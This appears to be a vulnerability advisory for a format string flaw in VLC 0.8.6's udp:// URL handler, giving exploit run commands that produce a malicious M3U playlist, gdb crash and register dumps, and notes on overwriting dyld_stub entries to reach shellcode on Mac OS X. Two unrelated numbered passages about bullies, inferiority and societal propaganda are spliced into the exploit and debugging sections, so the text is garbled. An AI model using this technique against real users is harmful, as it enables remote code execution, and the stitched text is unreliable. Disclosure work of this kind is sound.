
I hear your plea

Summary

The following description of the software is provided by the vendor (VideoLAN):

VideoLAN is a software project, which produces free software for video, released under the GNU General Public License. The main product is the cross-platform VLC media player. The VLC media player is a highly portable multimedia player for various audio and video formats (MPEG1, MPEG2, MPEG4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols. It can also be used as a server to stream in unicast or multicast in IPv4 or IPv6 on a high-bandwidth network.

A format string vulnerability exists in the handling of udp:// URLs by the udp:// URL handler. By supplying a specially crafted URL, a remote attacker could cause arbitrary code execution with the privileges of the user running VLC.

Affected versions

This issue has been successfully exploited in VLC version 0.8.6 for Mac OS X. Previous versions and other platforms might be affected (thanks to David Maynor for confirming the issue in the Microsoft Windows version).

Proof of concept, exploit or instructions to reproduce

Requires a working Perl interpreter. The exploit(s) provided will create an M3U file, which can be opened locally or served remotely via a web server. The exploit source code includes notes and other comments about the different options available. Both x86 and PowerPC versions are provided.

$ perl VLCMediaSlayer-x86.pl
$ open pwnage.m3u
(...)
			
1. (Paragraph 19) We are asserting that ALL, or even most, bullies and ruthless competitors suffer from feelings of inferiority.

You may want to use a suitable shellcode of your choice. The exploit will need some adjustment.

Debugging information

The following information aims to provide some details about the issue on both the Mac OS X and Microsoft Windows platforms (it might be updated as necessary):

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /Applications/VLC.app/Contents/MacOS/VLC 
Reading symbols for shared libraries . done
Reading symbols for shared libraries + done
Reading symbols for shared libraries ++++ done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
[00000297] access_udp access error: cannot open socket
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
[00000303] access_udp access error: cannot open socket

Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
[Switching to process 785 thread 0x7c0f]
0xa0011397 in dyld_stub___vfprintf ()
(gdb) info registers 
eax            0xb04882b4       -1337425228
ecx            0x0      0
edx            0xa00023c0       -1610603584
ebx            0x90022851       -1878906799
esp            0xb04881dd       0xb04881dd
ebp            0xb0488319       0xb0488319
esi            0x400    1024
edi            0x29eb400        43955200
eip            0xa0011397       0xa0011397 
eflags         0x10282  66178
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55
			
4. (Paragraph 28) There are many individuals of the middle and upper classes who resist some of these values, but usually their resistance is more or less covert. Such resistance appears in the mass media only to a very limited extent. The main thrust of propaganda in our society is in favor of the stated values.

Notes

Exploitation conditions

Kevin has written a nice explanation about format strings on OS X, and overwriting dyld_stub addresses: Non eXecutable Stack Lovin on OSX86 (05/18/06).

(gdb) x/6i 0x69027f
0x69027f <dyld_stub_exit+3>:    js     0x690210 <yytext_ptr+5008>
(...)
0x690286 <dyld_stub_dlopen>:    call   0x8fe12f70 <__dyld_fast_stub_binding_helper_interface>
(...)
0x690290 <dyld_stub_free>:      jmp    0x90004e30 <free>
0x690295 <dyld_stub_malloc>:    jmp    0x9000243a <malloc>

For successful exploitation on x86, overwriting a dyld_stub_ entry is necessary, for example to redirect it into heap space where shellcode is located. In order to place shellcode at a suitable location, the format string must be crafted to write it byte by byte at a specific address.

Read the exploit source code for further information. PowerPC doesn't require this trick for exploitation.

Workaround or temporary solution

The only potential workarounds are disabling the udp:// URL handler, uninstalling VLC, updating to the CVS version once a fix has been made available, or simply living with the feeling of being a potential target for pwnage.